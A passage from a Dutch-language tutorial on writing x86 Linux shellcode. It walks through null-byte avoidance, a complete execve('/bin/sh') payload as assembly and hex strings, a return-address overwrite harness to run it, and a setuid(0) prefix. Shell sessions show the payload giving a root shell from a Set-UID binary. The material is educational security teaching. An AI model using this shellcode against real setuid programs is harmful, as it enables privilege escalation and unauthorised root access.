De subroutine is natuurlijk geen echte: of de execve() aanroep gaat goed en het proces wordt vervangen door shell code, of hij gaat fout en de _exit() functie beëindigt het programma. Het %esi register geeft ons het "/bin/sh" string adres. Daarna is het voldoende om de array op te bouwen en deze direct na de string te implementeren: z'n eerste onderdeel (op %esi+8, /bin/sh lengte + een null byte) bevat de waarde van het %esi register, en z'n tweede op %esi+12 een null adres (32 bit). De code zal er nu als volgt uit zien:

  popl %esi
  movl %esi, 0x8(%esi)
  movl $0x00, 0xc(%esi)

Het diagram 6 laat het gegevensgebied zien:

Diag. 6 : data array
data area

Het null bytes probleem

Kwetsbare functies zijn vaak string manipulatie routines zoals strcpy(). Om de code te implementeren in het midden van de doelapplicatie, moet de shellcode gekopieerd worden als string. Echter, deze kopieer routines houden op zodra ze een null karakter tegenkomen. Daarom moet onze code geen null karakter bevatten. Door gebruik te maken van enkele trucs, kunnen we zorgen dat we geen null bytes schrijven. Bijvoorbeeld de volgende instructie:

  movl $0x00, 0x0c(%esi)

zal vervangen worden door
  xorl %eax, %eax
  movl %eax, %0x0c(%esi)

Dit voorbeeld laat het gebruik van een null byte zien. Echter, de vertaling van enkele instructies naar hexadecimale waarde kan hier enkelen van onthullen. Bijvoorbeeld om het onderscheid te maken tussen de _exit(0) systeemaanroep en de anderen, de %eax register waarde is 1, zoals te zien is in
0x804d996 <_exit+6>: mov $0x1,%eax
Geconverteerd naar hexadecimale waarde wordt deze string:
 b8 01 00 00 00     mov  $0x1,%eax
Je moet nu z'n gebruik omzeilen. De truc is in feite om de %eax te initialiseren met een register waarde van 0 en deze te verhogen.

Aan de andere kant moet de "/bin/sh" string eindigen met een null byte. We kunnen alleen schrijven tijdens het creëren van de shellcode, maar, afhankelijk van de gebruikte mechanismen, om te plaatsen in een programma, deze null byte hoeft niet aanwezig te zijn in de uiteindelijke applicatie. Het is beter om er een toe te voegen op de volgende manier:

  /* movb only works on one byte */
  /* this instruction is equivalent to */
  /* movb %al, 0x07(%esi) */
  movb %eax, 0x07(%esi)

Het bouwen van de shellcode

We hebben nu alles om onze shellcode te maken:

/* shellcode4.c */

int main()
{
 asm("jmp subroutine_call

subroutine:
  /* Getting /bin/sh address*/
    popl %esi
  /* Writing it as first item in the array */
    movl %esi,0x8(%esi)
  /* Writing NULL as second item in the array */
    xorl %eax,%eax
    movl %eax,0xc(%esi)
  /* Putting the null byte at the end of the string */
    movb %eax,0x7(%esi)
  /* execve() function */
    movb $0xb,%al
  /* String to execute in %ebx */
    movl %esi, %ebx
  /* Array arguments in %ecx */
    leal 0x8(%esi),%ecx
  /* Array environment in %edx */
    leal 0xc(%esi),%edx
  /* System-call */
    int $0x80

  /* Null return code */
    xorl %ebx,%ebx
  /* _exit() function : %eax = 1 */
    movl %ebx,%eax
    inc %eax
  /* System-call */
    int $0x80

subroutine_call:
    subroutine_call
    .string \"/bin/sh\"
   ");
}

De code wordt gecompileerd met "gcc -o shellcode4 shellcode4.c". Het commando "objdump --disassemble shellcode4" verzekert ons dat onze binary geen null bytes meer bevat:

08048398 <main>:
 8048398:  55           pushl %ebp
 8048399:  89 e5          movl  %esp,%ebp
 804839b:  eb 1f          jmp  80483bc <subroutine_call>

0804839d <subroutine>:
 804839d:  5e           popl  %esi
 804839e:  89 76 08        movl  %esi,0x8(%esi)
 80483a1:  31 c0          xorl  %eax,%eax
 80483a3:  89 46 0c        movb  %eax,0xc(%esi)
 80483a6:  88 46 07        movb  %al,0x7(%esi)
 80483a9:  b0 0b          movb  $0xb,%al
 80483ab:  89 f3          movl  %esi,%ebx
 80483ad:  8d 4e 08        leal  0x8(%esi),%ecx
 80483b0:  8d 56 0c        leal  0xc(%esi),%edx
 80483b3:  cd 80          int  $0x80
 80483b5:  31 db          xorl  %ebx,%ebx
 80483b7:  89 d8          movl  %ebx,%eax
 80483b9:  40           incl  %eax
 80483ba:  cd 80          int  $0x80

080483bc <subroutine_call>:
 80483bc:  e8 dc ff ff ff     call  804839d <subroutine>
 80483c1:  2f           das
 80483c2:  62 69 6e        boundl 0x6e(%ecx),%ebp
 80483c5:  2f           das
 80483c6:  73 68          jae  8048430 <_IO_stdin_used+0x14>
 80483c8:  00 c9          addb  %cl,%cl
 80483ca:  c3           ret
 80483cb:  90           nop
 80483cc:  90           nop
 80483cd:  90           nop
 80483ce:  90           nop
 80483cf:  90           nop

De gegevens die gevonden kunnen worden na het 80483c1 adres representeert geen instructies, maar de "/bin/sh" string karakters (in hexadecimalen, de sequentie 2f 62 69 6e 2f 73 68 00) en random bytes. De code bevat geen nullen, behalve het nul karakter aan het einde van de string op 80483c8.

Laten we ons programma testen:

$ ./shellcode4
Segmentation fault (core dumped)
$

Ooops! Dit geeft geen uitsluitsel. Als we een beetje nadenken, kunnen we zien dat het geheugengebied waar de main() functie kan worden gevonden (dus: het text gebied dat al genoemd is aan het begin van dit artikel) alleen-lezen is. De shellcode kan dit niet veranderen. Wat kunnen we nu doen om onze shellcode te testen?

Om het alleen lezen probleem te omzeilen, moet de shellcode in een gegevensgebied geplaatst worden. Laten we het eens in een array plaatsen die tot globale variabele verklaard wordt. We moeten een andere truc toepassen om onze shellcode uit te kunnen voeren. Laten we het main() functie retouradres dat gevonden wordt in de stack vervangen door het adres van de array dat de shellcode bevat. Vergeet niet dat de main functie een "standaard" routine is, aangeroepen door delen van code dat de koppelaar (linker) toegevoegd heeft. Het retouradres wordt overschreven zodra de karakter array twee plaatsen onder de eerste positie in de stack wordt geschreven.

 /* shellcode5.c */

 char shellcode[] =
 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
 "\x80\xe8\xdc\xff\xff\xff/bin/sh";

 int main()
 {
   int * ret;

   /* +2 will behave as a 2 words offset */
   /* (i.e. 8 bytes) to the top of the stack : */
   /*  - the first one for the reserved word for the
       local variable */
   /*  - the second one for the saved %ebp register */

   * ((int *) & ret + 2) = (int) shellcode;
   return (0);
 }

Nu kunnen we onze shellcode testen:

$ cc shellcode5.c -o shellcode5
$ ./shellcode5
bash$ exit
$

We kunnen zelfs het shellcode5 programma draaien met Set-UID root, en de shell die gestart is met de gegevens die door dit programma worden uitgevoerd onder de root  identiteit controleren:

$ su
Password:
# chown root.root shellcode5
# chmod +s shellcode5
# exit
$ ./shellcode5
bash# whoami
root
bash# exit
$

Generalisaties en laatste details

Deze shellcode is wat beperkt (ach, het is nog niet zo slecht met zo weinig bytes!). Zo wordt ons testprogramma bijvoorbeeld:

 /* shellcode5bis.c */

 char shellcode[] =
 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
 "\x80\xe8\xdc\xff\xff\xff/bin/sh";

 int main()
 {
   int * ret;
   seteuid(getuid());
   * ((int *) & ret + 2) = (int) shellcode;
   return (0);
 }
We repareren het effectieve UID van het proces naar z'n echte UID waarde, zoals we al voorstelden in het vorige artikel. Deze keer wordt de shell uitgevoerd zonder specifieke privileges:
$ su
Password:
# chown root.root shellcode5bis
# chmod +s shellcode5bis
# exit
$ ./shellcode5bis
bash# whoami
pappy
bash# exit
$

Echter, de seteuid(getuid()) instructies zijn geen erg effectieve bescherming. Je hoeft alleen maar de setuid(0); aanroep te plaatsen, of een equivalent, aan het begin van shellcode om de rechten gekoppeld te krijgen aan de initiële EUID voor een S-UID applicatie.

Deze instructiecode is:

 char setuid[] =
     "\x31\xc0"    /* xorl %eax, %eax */
     "\x31\xdb"    /* xorl %ebx, %ebx */
     "\xb0\x17"    /* movb $0x17, %al */
     "\xcd\x80";

Integreer dit in onze eerdere shellcode en ons voorbeeld wordt:
 /* shellcode6.c */

 char shellcode[] =
 "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid(0) */
 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
 "\x80\xe8\xdc\xff\xff\xff/bin/sh";

 int main()
 {
   int * ret;
   seteuid(getuid());
   * ((int *) & ret + 2) = (int) shellcode;
   return (0);
 }
Laten we eens kijken hoe het werkt:
$ su
Password:
# chown root.root shellcode6
# chmod +s shellcode6
# exit
$ ./shellcode6
bash# whoami
root
bash# exit
$

Zoals al getoond is in het laatste voorbeeld, is het mogelijk om functies toe te voegen aan shellcode, bijvoorbeeld om een directory te verlaten die door de chroot() functie is verplicht of om een shell op afstand te openen met behulp van een socket.

Zulke veranderingen lijken te impliceren dat je de waarde van sommige bytes in de shellcode kan aanpassen aan de manier waarop ze gebruikt worden:

eb XX <subroutine_call> XX = aantal bytes om <subroutine_call> te bereiken
<subroutine>:
5e popl %esi
89 76 XX movl %esi,XX(%esi) XX = position van het eerste item in de argumenten array (d.w.z. het adres van het commando). Deze offset is gelijk aan het aantal karakters in het commando, inclusief '\0'.
31 c0 xorl %eax,%eax
89 46 XX movb %eax,XX(%esi) XX = position van het tweede item in de array, die hier een NULL waarde heeft.
88 46 XX movb %al,XX(%esi) XX = positie van het einde van de string '\0'.
b0 0b movb $0xb,%al
89 f3 movl %esi,%ebx
8d 4e XX leal XX(%esi),%ecx XX = offset om het tweede item te bereiken en het in het %ecx register te plaatsen
8d 56 XX leal XX(%esi),%edx XX = offset om het tweede item in de argumenten array te bereiken en het in het %edx register te plaatsen
cd 80 int $0x80
31 db xorl %ebx,%ebx
89 d8 movl %ebx,%eax
40 incl %eax
cd 80 int $0x80
<subroutine_call>:
e8 XX XX XX XX call <subroutine> Deze 4 bytes corresponderen met het aantal bytes dat de <subroutine> bereiken (negatief aantal, geschreven in klein "endian")

Conclusie

We schreven een programma van ongeveer 40 byte en we kunnen ieder willekeurig extern commando draaien als root. Ons laatste voorbeeld laat enkele ideeën zien over hoe een stack "platgeslagen" kan worden. Meer details over dit mechanisme in het volgende artikel...